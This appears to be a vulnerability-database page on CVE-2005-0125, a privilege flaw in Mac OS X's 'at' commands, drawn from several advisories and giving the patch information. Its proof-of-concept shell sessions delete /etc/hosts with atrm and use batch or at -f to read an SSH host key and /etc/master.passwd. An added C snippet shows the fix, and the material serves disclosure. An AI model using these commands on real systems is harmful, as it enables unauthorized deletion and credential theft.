CVE-2005-0125
CVSS 7.2
Published: 2005-05-02 00:00:00
Last modified: 2016-10-17 23:07:57

[Original] The "at" commands on Mac OS X 10.3.7 and earlier do not properly drop privileges, which allows local users to (1) delete arbitrary files via atrm, (2) execute arbitrary programs via the -f argument to batch, or (3) read arbitrary files via the -f argument to batch, which generates a job file that is readable by the local user.


[CNNVD] Apple OS X multiple application security vulnerabilities (CNNVD-200505-512)

        Mac OS X is a BSD-based operating system.
        Several at-related commands shipped with Mac OS X do not properly drop privileges; a local attacker can exploit these flaws to delete files, run arbitrary commands, and read sensitive information.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [complete information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [exploitation has no access restrictions]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:apple:mac_os_x:10.3.7  Apple Mac OS X 10.3.7
cpe:/o:apple:mac_os_x_server:10.3.7  Apple Mac OS X Server 10.3.7
cpe:/o:apple:mac_os_x:10.3.4  Apple Mac OS X 10.3.4

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0125
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0125
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-512
(official data source) CNNVD

- Other links and resources

http://lists.apple.com/archives/security-announce/2005/Jan/msg00001.html
(VENDOR_ADVISORY)  APPLE  APPLE-SA-2005-01-25
http://marc.info/?l=bugtraq&m=110685027017411&w=2
(UNKNOWN)  BUGTRAQ  20050127 DMA[2005-0127a] - 'Apple OSX batch family poor use of setuid'
http://www.digitalmunition.com/DMA%5B2005-0127a%5D.txt
(UNKNOWN)  MISC  http://www.digitalmunition.com/DMA[2005-0127a].txt
http://www.kb.cert.org/vuls/id/678150
(VENDOR_ADVISORY)  CERT-VN  VU#678150
http://xforce.iss.net/xforce/xfdb/18981
(VENDOR_ADVISORY)  XF  macos-at-gain-privileges(18981)

- Vulnerability information

Apple OS X multiple application security vulnerabilities
High risk  Access validation error
2005-05-02 00:00:00 2005-10-20 00:00:00
Local
        Mac OS X is a BSD-based operating system.
        Several at-related commands shipped with Mac OS X do not properly drop privileges; a local attacker can exploit these flaws to delete files, run arbitrary commands, and read sensitive information.

- Advisories and patches

        The vendor has released an update that fixes this security issue; please download it from the vendor's home page:
        http://www.apple.com/support/downloads/securityupdate2005001macosx1028client.html

- Vulnerability information (F35929)

DMA-2005-0127a.txt (PacketStormID:F35929)
2005-01-28 00:00:00
Kevin Finisterre  
exploit
apple,osx
CVE-2005-0125

Apple's OS X batch family of commands make poor use of setuid capabilities allowing for privilege escalation.

DMA[2005-0127a] - 'Apple OSX batch family poor use of setuid'
Author: Kevin Finisterre
Vendor: http://www.apple.com/macosx/
Product: * at commands <= Mac OS X v10.3.7, Mac OS X Server v10.3.7

References: (CAN-2005-0125)
http://www.digitalmunition.com/DMA[2005-0127a].txt
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0125
http://lists.apple.com/archives/security-announce/2005/Jan/msg00001.html
http://www.apple.com/support/downloads/securityupdate2005001macosx1028client.html
http://docs.info.apple.com/article.html?artnum=300770
http://www.immunitysec.com/downloads/nukido.pdf
http://www.immunitysec.com/downloads/nukido.sxw

Description: 
Mac OS X v10.3 Panther offers breakthroughs in innovation and ease of use that won't 
be seen in other operating systems for years, if ever, while its UNIX-based core 
provides rock-solid security on the Internet.

On 1/25/2005 Apple published an advisory for the "at" commands to address a local 
privilege escalation vulnerability. The "at" family of commands did not properly drop 
privileges. This could allow a local user to remove files not owned by them, run programs 
with added privileges, or read the contents of normally unreadable files. The update 
patched the commands at, atrm, batch, atq, and atrun. 

The following session outlines the behavior that was reported. 

Please note that at, batch, atq, atrm are all disabled by default on Mac OS X.  Each 
of these commands depends on the execution of atrun, which has been disabled due to power 
management concerns.  Those who would like to use these commands must first re-enable 
/usr/libexec/atrun by removing the leading '#' from the line
#*/5    *       *       *       *       root    /usr/libexec/atrun
in the file /etc/crontab.  

'atrm' can be used to delete any file on the system. The atrm vulnerability does not 
depend upon atrun. 

CrunkJuice:~ kevinfinisterre$ id
uid=501(kevinfinisterre) gid=501(kevinfinisterre) groups=501(kevinfinisterre), 
79(appserverusr), 80(admin), 81(appserveradm)

CrunkJuice:~ kevinfinisterre$ rm /etc/hosts
override rw-r--r--  root/wheel for /etc/hosts? y
rm: /etc/hosts: Permission denied

CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts
-rw-r--r--  1 root  wheel  214  3 Dec 20:19 /etc/hosts

CrunkJuice:~ kevinfinisterre$ atrm /etc/hosts

CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts
ls: /etc/hosts: No such file or directory

'batch' can be used to execute commands as gid=0(wheel) groups=0(wheel), 1(daemon), 
2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) 

CrunkJuice:/tmp kevinfinisterre$ echo > aa
/usr/bin/id > /tmp/test

CrunkJuice:/tmp kevinfinisterre$ batch -f /tmp/aa 0
Job b0118490c.000 will be executed using /bin/sh

CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test
cat: /tmp/test: No such file or directory

(wait 5 minutes)

CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test
uid=501(kevinfinisterre) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys),
 4(tty), 5(operator), 20(staff), 31(guest), 80(admin)

'batch' can also be used to read any file on the system. 

CrunkJuice:~ kevinfinisterre$ cat /etc/ssh_host_dsa_key
cat: /etc/ssh_host_dsa_key: Permission denied

CrunkJuice:~ kevinfinisterre$ ls -al /etc/ssh_host_dsa_key
-rw-------  1 root  wheel  668 16 Nov 19:39 /etc/ssh_host_dsa_key

CrunkJuice:~ kevinfinisterre$ batch -f /etc/ssh_host_dsa_key
Job b011848db.000 will be executed using /bin/sh

CrunkJuice:~ kevinfinisterre$ ls -al /var/at/jobs/b011848db.000
-rwx------  1 kevinfin  wheel  1263  3 Dec 20:31 /var/at/jobs/b011848db.000

CrunkJuice:~ kevinfinisterre$ cat /var/at/jobs/b011848db.000
#! /bin/sh
# mail     root 0
umask 22
TERM_PROGRAM=Apple\_Terminal; export TERM_PROGRAM
SHELL=\/bin\/bash; export SHELL
TERM_PROGRAM_VERSION=100; export TERM_PROGRAM_VERSION
OLDPWD=\/var\/at\/jobs; export OLDPWD
USER=kevinfinisterre; export USER
__CF_USER_TEXT_ENCODING=0x1F5\:0\:0; export __CF_USER_TEXT_ENCODING
PATH=\/bin\:\/sbin\:\/usr\/bin\:\/usr\/sbin; export PATH
PWD=\/Users\/kevinfinisterre; export PWD
SHLVL=1; export SHLVL
HOME=\/Users\/kevinfinisterre; export HOME
LOGNAME=kevinfinisterre; export LOGNAME
SECURITYSESSIONID=20ee50; export SECURITYSESSIONID
cd /Users/kevinfinisterre
-----BEGIN DSA PRIVATE KEY-----
ascsefmwe;lijweio;fj23n8r01ur9wefskljvnsdlvsd;kvcms;dkmcv;sdklvm
dfbkldfmbdfp0bjerpgjwglvksdmvw430vgwevklmsdkvmasdvnqwefh3bnjnsek
6513515641w6egf4e65v4s6v54we65f4ae6f464b6464b6w4bw6e4bvgw6evgf4w
sdvsdfbgfgbndfdfvbsdfvsd5v46se8f4634f6w3f4q3f4sd35vf4sd3v4sd3v4s
ascsefmwe;lijweio;fj23n8r01ur9wefskljvnsdlvsd;kvcms;dkmcv;sdklvm
dfbkldfmbdfp0bjerpgjwglvksdmvw430vgwevklmsdkvmasdvnqwefh3bnjnsek
6513515641w6egf4e65v4s6v54we65f4ae6f464b6464b6w4bw6e4bvgw6evgf4w
sdvsdfbgfgbndfdfvbsdfvsd5v46se8f4634f6w3f4q3f4sd35vf4sd3v4sd3v4s
ereethamstahenkryption
-----END DSA PRIVATE KEY-----

Apple has released patches for this vulnerability, please see the 
references above. 

For the protection of its customers, Apple does not disclose, discuss,
or confirm security issues until a full investigation has occurred and
any necessary patches or releases are available. Apple likes to focus 
response efforts so that they have the greatest impact across
the product line, because of this they generally will not respond to 
e-mail messages unless further information is needed for a security 
issue.

This is the timeline associated with this bug. 

12/20/2004 02:22 PM - initial response
01/03/2005 09:17 PM - followup
01/12/2005 02:56 PM - ...
01/13/2005 08:41 PM - ...
01/19/2005 12:16 AM - confirm credit
01/20/2005 12:13 PM - immunitysec nukido release

-KF
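As an added illustration (not Apple's at/batch source and not from the advisory above), the privilege-drop pattern the advisory says the at family lacked: a setuid helper drops to the caller's real uid and gid, verifies that the drop actually took, and only then opens the user-supplied -f file, so a root-only file such as /etc/ssh_host_dsa_key is refused by the kernel instead of being copied into a job file the caller can read. The function names drop_privileges and open_job_source are my own.

```c
#define _GNU_SOURCE               /* O_NOFOLLOW / O_CLOEXEC on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Permanently drop to the caller's real uid/gid. Returns 0 on success, -1 on
 * failure. gid first: once the uid is unprivileged, setgid() would fail. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    if (setgid(rgid) != 0)   /* with euid 0 this sets real, effective, saved */
        return -1;
    if (setuid(ruid) != 0)
        return -1;
    /* Verify every credential is now the caller's own ... */
    if (getgid() != rgid || getegid() != rgid ||
        getuid() != ruid || geteuid() != ruid)
        return -1;
    /* ... and that root cannot be regained (a silently failed drop is the
     * bug class here); skipped when the caller genuinely is root. */
    if (ruid != 0 && seteuid(0) == 0)
        return -1;
    return 0;
}

/* Open the script named by -f only after the drop, so the kernel applies the
 * caller's permissions: a root-only file yields EACCES instead of a copy in
 * a user-readable job file. Returns the fd, or -1 with errno set. */
int open_job_source(const char *path)
{
    if (drop_privileges() != 0)
        return -1;
    /* O_NOFOLLOW: a symlink planted at the path must not redirect the open */
    return open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
}

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <script-file>\n", argv[0]); return 2; }
    int fd = open_job_source(argv[1]);
    if (fd < 0) { fprintf(stderr, "%s: %s\n", argv[1], strerror(errno)); return 1; }
    printf("opened %s with uid %u\n", argv[1], (unsigned)getuid());
    close(fd);
    return 0;
}
```

Installed setuid root, the helper behaves like the patched at: the open is judged against the invoking user's credentials, not root's.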



- Vulnerability information

13180
Apple Mac OS X at Package batch Command Privilege Escalation
Local Access Required Authentication Management
Loss of Integrity
Exploit Public

- Vulnerability description

Mac OS X contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when the batch command fails to drop root privileges and runs user-specified commands as root. By passing the -f argument to the command, a malicious user could execute and/or read arbitrary files, resulting in a loss of integrity.

- Timeline

2005-01-25 2004-12-20
2005-01-25 Unknown

- Solution

Upgrade to version 10.3.8 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

- Vulnerability information

Apple Mac OS X At Utility Family Multiple Local Privilege Escalation Vulnerabilities
Access Validation Error 12297
No Yes
2005-01-18 12:00:00 2009-07-12 10:06:00
Discovery of this issue is credited to Immunity Inc. Discovery of the 'batch' command issue is credited to KF <kf_lists@digitalmunition.com>.

- Affected program versions

Apple Mac OS X Server 10.3.7
Apple Mac OS X Server 10.3.6
Apple Mac OS X Server 10.3.5
Apple Mac OS X Server 10.3.4
Apple Mac OS X Server 10.3.3
Apple Mac OS X Server 10.3.2
Apple Mac OS X Server 10.3.1
Apple Mac OS X Server 10.3
Apple Mac OS X 10.3.7
Apple Mac OS X 10.3.6
Apple Mac OS X 10.3.5
Apple Mac OS X 10.3.4
Apple Mac OS X 10.3.3
Apple Mac OS X 10.3.2
Apple Mac OS X 10.3.1
Apple Mac OS X 10.3
Apple Mac OS X Server 10.3.8
Apple Mac OS X 10.3.8

- Unaffected program versions

Apple Mac OS X Server 10.3.8
Apple Mac OS X 10.3.8

- Vulnerability discussion

Multiple privilege escalation issues affect the 'at' family of utilities on Apple Mac OS X. These issues are due to a failure of the application to properly implement access controls on job schedule files.

An attacker may leverage these issues to read and delete arbitrary files and execute applications on an affected computer with superuser privileges. Information revealed in this way may lead to further attacks.

- Exploit

No exploit is required to leverage these issues. The following proof of concept has been provided to view the master.passwd file:

tcsh% at -f /etc/master.passwd 12:44
Job a01194a36.001 will be executed using /bin/sh
tcsh% cat /var/at/jobs/a01194a36.001
tcsh% atrm a01194a36.001

The following proof of concept has been provided to remove arbitrary files from the affected computer:

tcsh% atrm fileName

Finally the following sequence will allow for the execution of the 'id' command with escalated privileges:

tcsh% echo > aa
/usr/bin/id > /tmp/test
tcsh% batch -f /tmp/aa 0
Job b0118490c.000 will be executed using /bin/sh
tcsh% cat /tmp/test
cat: /tmp/test: No such file or directory
(wait for the scheduled job to run)
tcsh% cat /tmp/test
uid=500(username) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest), 80(admin)

- Solution

Apple Computers has released advisory APPLE-SA-2005-01-25 along with a security update dealing with this and other issues. Please see the referenced advisory for more information.

Apple Computers has released Mac OS X version 10.3.8 dealing with this issue. This upgrade includes the security patches shipped with the referenced security update.


Apple Mac OS X Server 10.3.7

Apple Mac OS X 10.3.7

- Related references
